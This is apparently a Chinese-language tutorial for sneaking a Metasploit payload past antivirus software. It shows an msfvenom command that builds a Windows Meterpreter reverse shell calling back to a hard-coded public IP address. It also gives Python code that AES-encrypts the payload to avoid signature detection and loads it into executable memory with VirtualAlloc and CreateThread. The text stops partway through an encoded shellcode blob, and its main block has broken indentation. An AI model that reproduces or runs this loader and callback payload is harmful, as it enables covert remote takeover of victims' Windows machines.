目录
MSF
msf生成的shellcode采用base64编码
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=47.94.236.117 lport=6688 -f c
脚本里面内置的 AES 加密函数和解密函数
encrypt加密
decrypt解密
两个脚本：一个脚本加密，加密结果由另一个脚本解密后调用执行（两个脚本里的 key 和 iv 必须完全一致，否则解密得到的是乱码）
1.py
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64
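def add_to_16(text) -> bytes:
    """Right-pad *text* with NUL bytes up to a multiple of 16 bytes (the AES block size).

    Args:
        text: Plaintext as ``str`` (UTF-8 encoded first) or raw ``bytes``.

    Returns:
        The UTF-8 / raw bytes with ``b"\\0"`` appended until the length is a
        multiple of 16. An empty input stays empty; an input that is already
        a block multiple is returned unchanged.

    Note:
        The padding is NUL bytes, not spaces (an older comment said spaces).
        NUL padding is not self-describing: a receiver that strips trailing
        NULs (as ``decrypt`` does) also strips genuine trailing ``\\x00`` bytes
        of the payload. That is harmless for a base64 text payload, but raw
        shellcode ending in ``\\x00`` would be truncated -- use PKCS#7 padding
        if raw bytes must survive the round trip.
    """
    data = text.encode('utf-8') if isinstance(text, str) else bytes(text)
    remainder = len(data) % 16
    pad = (16 - remainder) if remainder else 0
    return data + b'\0' * pad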
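def encrypt(text, key=b'9999999999999999', iv=b'qqqqqqqqqqqqqqqq'):
    """AES-128-CBC encrypt *text* and return the ciphertext as a hex string.

    Args:
        text: Plaintext ``str``. It is UTF-8 encoded and NUL-padded to a
            16-byte multiple by ``add_to_16`` before encryption.
        key: 16-byte AES key. Defaults to the value the script originally
            hard-coded; ``decrypt`` must be called with the same key.
        iv: 16-byte CBC initialisation vector, same caveat as ``key``.

    Returns:
        ``bytes`` holding the lowercase hex encoding of the ciphertext, so the
        result survives printing / copy-paste into the loader script.

    Security note:
        The default key and IV are constants shipped inside both scripts, so
        this hides the payload from static signature matching only -- anyone
        holding the loader can recover the plaintext. A fixed IV also makes
        equal plaintexts produce equal ciphertexts. Pass fresh values if that
        matters for your use.
    """
    cipher = AES.new(key, AES.MODE_CBC, iv)
    cipher_text = cipher.encrypt(add_to_16(text))
    # Hex rather than raw bytes: the ciphertext is arbitrary binary and would
    # not round-trip reliably through print/copy as text.
    return b2a_hex(cipher_text)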
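def decrypt(text, key=b'9999999999999999', iv=b'qqqqqqqqqqqqqqqq'):
    """Reverse ``encrypt``: hex ciphertext -> AES-128-CBC decrypt -> strip NUL padding.

    Only the loader script needs this; it is unused in the encrypting script
    and may be removed there.

    Args:
        text: Hex-encoded ciphertext as produced by ``encrypt`` (``str`` or
            ``bytes`` are both accepted by ``a2b_hex``).
        key: 16-byte AES key; must match the one used by ``encrypt``.
        iv: 16-byte CBC IV; must match the one used by ``encrypt``.

    Returns:
        The plaintext as ``str`` with trailing NUL padding removed.

    Raises:
        UnicodeDecodeError: if the decrypted bytes are not valid UTF-8 -- this
            is what a wrong key/IV looks like, and also what happens if raw
            (non-text) shellcode was encrypted. This function handles text
            payloads only, e.g. the base64 form from ``msfvenom --encrypt base64``.
        ValueError: if *text* is not valid hex or not a whole number of blocks.

    Note:
        ``rstrip('\\0')`` cannot distinguish padding from real trailing NUL
        characters, so a payload that ends in ``\\x00`` is truncated here.
    """
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plain = cipher.decrypt(a2b_hex(text))
    # The padding added by add_to_16 is NUL bytes, not spaces.
    return plain.decode('utf-8').rstrip('\0')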
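def zhixing(shellcode):
    """Execute *shellcode* in the current process (Windows only).

    Allocates an RWX page, copies the bytes in, starts a thread at the page
    and blocks until that thread exits.

    Args:
        shellcode: Raw machine-code ``bytes``. A ``str`` is rejected by
            ``ctypes.create_string_buffer`` on Python 3, so base64-decode /
            encode the ``decrypt`` output before calling this.

    Raises:
        OSError: if ``VirtualAlloc`` or ``CreateThread`` fails (the original
            ignored both return values and would then copy to / jump to NULL).
        AttributeError: on non-Windows platforms, where ``ctypes.windll`` does
            not exist.

    Notes:
        The original set no ``restype``/``argtypes``, so ctypes treated the
        ``VirtualAlloc`` / ``CreateThread`` results as 32-bit C ``int``. On
        64-bit Windows that silently truncates the page address and the copy
        or thread start faults; the prototypes below are pointer-sized.
        The page is ``PAGE_EXECUTE_READWRITE``, which is one of the most
        common heuristics endpoint products key on -- behaviour kept as is.
    """
    kernel32 = ctypes.windll.kernel32
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    kernel32.VirtualAlloc.argtypes = (
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32,
    )
    kernel32.RtlMoveMemory.restype = None
    kernel32.RtlMoveMemory.argtypes = (
        ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
    )
    kernel32.CreateThread.restype = ctypes.c_void_p
    kernel32.CreateThread.argtypes = (
        ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
        ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p,
    )
    kernel32.WaitForSingleObject.argtypes = (ctypes.c_void_p, ctypes.c_uint32)

    MEM_COMMIT = 0x1000
    PAGE_EXECUTE_READWRITE = 0x40
    INFINITE = 0xFFFFFFFF  # the original passed -1, which is the same bit pattern

    size = len(shellcode)
    page = kernel32.VirtualAlloc(None, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    if not page:
        raise ctypes.WinError()
    # create_string_buffer appends a trailing NUL; only len(shellcode) bytes are copied.
    buf = ctypes.create_string_buffer(shellcode)
    kernel32.RtlMoveMemory(page, buf, size)
    thread = kernel32.CreateThread(None, 0, page, None, 0, None)
    if not thread:
        raise ctypes.WinError()
    kernel32.WaitForSingleObject(thread, INFINITE)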
if __name__ == '__main__':
#对payload进行base64加密
#msf
s = '''
\x2f\x45\x69\x44\x35\x50\x44\x6f\x7a\x41\x41\x41\x41\x45
\x46\x52\x51\x56\x42\x53\x53\x44\x48\x53\x5a\x55\x69\x4c
\x55\x6d\x42\x49\x69\x31\x49\x59\x55\x56\x5a\x49\x69\x31
\x49\x67\x54\x54\x48\x4a\x53\x41\x2b\x33\x53\x6b\x70\x49
\x69\x33\x4a\x51\x53\x44\x48\x41\x72\x44\x78\x68\x66\x41
\x49\x73\x49\x45\x48\x42\x79\x51\x31\x42\x41\x63\x48\x69
\x37\x56\x4a\x42\x55\x55\x69\x4c\x55\x69\x43\x4c\x51\x6a
\x78\x49\x41\x64\x42\x6d\x67\x58\x67\x59\x43\x77\x49\x50
\x68\x58\x49\x41\x41\x41\x43\x4c\x67\x49\x67\x41\x41\x41
\x42\x49\x68\x63\x42\x30\x5a\x30\x67\x42\x30\x49\x74\x49
\x47\x45\x53\x4c\x51\x43\x42\x4a\x41\x64\x42\x51\x34\x31
\x5a\x49\x2f\x38\x6c\x4e\x4d\x63\x6c\x42\x69\x7a\x53\x49
\x53\x41\x48\x57\x53\x44\x48\x41\x72\x45\x48\x42\x79\x51
\x31\x42\x41\x63\x45\x34\x34\x48\x58\x78\x54\x41\x4e\x4d
\x4a\x41\x68\x46\x4f\x64\x46\x31\x32\x46\x68\x45\x69\x30
\x41\x6b\x53\x51\x48\x51\x5a\x6b\x47\x4c\x44\x45\x68\x45
\x69\x30\x41\x63\x53\x51\x48\x51\x51\x59\x73\x45\x69\x45
\x67\x42\x30\x45\x46\x59\x51\x56\x68\x65\x57\x56\x70\x42
\x57\x45\x46\x5a\x51\x56\x70\x49\x67\x2b\x77\x67\x51\x56
\x4c\x2f\x34\x46\x68\x42\x57\x56\x70\x49\x69\x78\x4c\x70
\x53\x2f\x2f\x2f\x2f\x31\x31\x4a\x76\x6e\x64\x7a\x4d\x6c
\x38\x7a\x4d\x67\x41\x41\x51\x56\x5a\x4a\x69\x65\x5a\x49
\x67\x65\x79\x67\x41\x51\x41\x41\x53\x59\x6e\x6c\x53\x62
\x77\x43\x41\x42\x6f\x67\x77\x4b\x67\x54\x6c\x6b\x46\x55
\x53\x59\x6e\x6b\x54\x49\x6e\x78\x51\x62\x70\x4d\x64\x79